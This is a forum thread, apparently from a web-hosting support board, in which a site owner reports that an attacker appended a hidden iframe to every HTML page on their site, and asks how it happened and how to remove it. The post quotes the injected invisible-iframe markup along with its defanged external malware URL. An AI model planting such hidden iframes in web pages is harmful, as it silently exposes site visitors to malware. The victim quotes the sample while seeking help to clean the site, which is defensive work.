pison Posted May 28, 2013 Share Posted May 28, 2013 Someone managed to edit all my .htm, .html, and .shtml pages. They appended the following to all of my files ..... iframe src="" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/ (with beginning and ending < and >), and this for the src: http://www.lwg-eichstaedt.de/counter.php (I separated it so that it won't be an active link here - I don't want to infect the boards <sigh>) 2 questions: How did they do this? Every file was edited (presumably by script) at 9:30 a.m. on 17 May 2013. How did they get in? How do I prevent it in the future? I actually would expect the server to have better security than this. Please advise ..... Quote Link to comment Share on other sites More sharing options...
pison Posted May 28, 2013 Author Share Posted May 28, 2013 Someone, somehow, edited every single one of my .htm, .html, or .shtml pages to append the following link to the bottom of the file: &--#60;iframe src="" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/&--#62; between the two qoutes for 'src' is this: "http: // www.lwg-eichstaedt.de / counter.php" (remove the spaces ... I added them to deactivate the link here so as to not spread the malware). I did NOT do this to my pages. They were all done (presumably by script) at 9:30am on 17 May 2013. Questions: How did this happen? I would expect better security on the server. Is there anyone who can grep to do a global "find and replace" on my entire site? I've started downloading the site, but FTP chokes on me and dies midway through. I don't have the patience to figure out where it died and start from there ... over and over again. Related question:I can't get into my CPanel. I get the normal login screen, but then get "Thank You for installing cPanel / WHM." This server is currently not licensed. Please contact the server administrator. Other services available on this server such as web services are likely functioning normally. (License has a future date) Once the license on this server is active, you will no longer see this message. If you have installed a license since loading this page, click here to reload. here's the URL where I get that message: http://stevie.heliohost.org:2082/frontend/x3/index.phpcp . Is this related to being cracked/hacked? Quote Link to comment Share on other sites More sharing options...
Tjoene Posted May 29, 2013 Share Posted May 29, 2013 Perhaps he has cracked your password.Have you tried to change it? About the license: try to clear your cache. cPanel works fine for me. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.